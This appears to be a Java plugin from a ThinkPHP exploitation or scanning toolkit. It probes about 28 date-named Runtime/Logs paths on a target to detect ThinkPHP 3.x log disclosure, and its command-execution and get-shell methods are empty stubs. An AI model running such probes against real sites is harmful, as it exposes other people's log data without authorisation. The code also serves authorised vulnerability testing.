package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;

import java.util.ArrayList;
import java.util.Date;

/**
 * Author 莲花 2021/6/27
 */
public class tp3_log implements BasePayload {
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "INFO:";
        String CheckErr = "[ error ]";
        Date dt = new Date();
        String year = String.format("%tY", dt);
        String mon = String.format("%tm", dt);
        String day = String.format("%td", dt);
        String sjc = String.valueOf(dt.getTime()).substring(0, 10);
        String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
        String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log";
        ArrayList<String> payload_urls = new ArrayList<String>() {{
            add(url + "/Runtime/Logs/" + suffix1);
            add(url + "/Runtime/Logs/" + suffix2);

            add(url + "/Runtime/Logs/Home/" + suffix1);
            add(url + "/Runtime/Logs/Home/" + suffix2);

            add(url + "/Runtime/Logs/Common/" + suffix1);
            add(url + "/Runtime/Logs/Common/" + suffix2);

            add(url + "/App/Runtime/Logs/" + suffix1);
            add(url + "/App/Runtime/Logs/" + suffix2);

            add(url + "/App/Runtime/Logs/Home/" + suffix1);
            add(url + "/App/Runtime/Logs/Home/" + suffix2);

            add(url + "/Application/Runtime/Logs/" + suffix1);
            add(url + "/Application/Runtime/Logs/" + suffix2);

            add(url + "/Application/Runtime/Logs/Admin/" + suffix1);
            add(url + "/Application/Runtime/Logs/Admin/" + suffix2);

            add(url + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/Application/Runtime/Logs/Home/" + suffix2);

            add(url + "/Application/Runtime/Logs/App/" + suffix1);
            add(url + "/Application/Runtime/Logs/App/" + suffix2);

            add(url + "/Application/Runtime/Logs/Ext/" + suffix1);
            add(url + "/Application/Runtime/Logs/Ext/" + suffix2);

            add(url + "/Application/Runtime/Logs/Api/" + suffix1);
            add(url + "/Application/Runtime/Logs/Api/" + suffix2);

            add(url + "/Application/Runtime/Logs/Test/" + suffix1);
            add(url + "/Application/Runtime/Logs/Test/" + suffix2);

            add(url + "/Application/Runtime/Logs/Common/" + suffix1);
            add(url + "/Application/Runtime/Logs/Common/" + suffix2);

            add(url + "/Application/Runtime/Logs/Service/" + suffix1);
            add(url + "/Application/Runtime/Logs/Service/" + suffix2);
        }};
        try {
            for (String payload_url : payload_urls) {
                String res = HttpRequest.get(payload_url).body();
                if (res.contains(CheckStr)||res.contains(CheckErr)) {
                    return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url);
                }
            }

        } catch (Exception e) {
            e.printStackTrace();
        }

        return new Result(false, "ThinkPHP 3.x 日志泄露", "");
    }

    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, "", "");
    }

    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, "", "");
    }
}
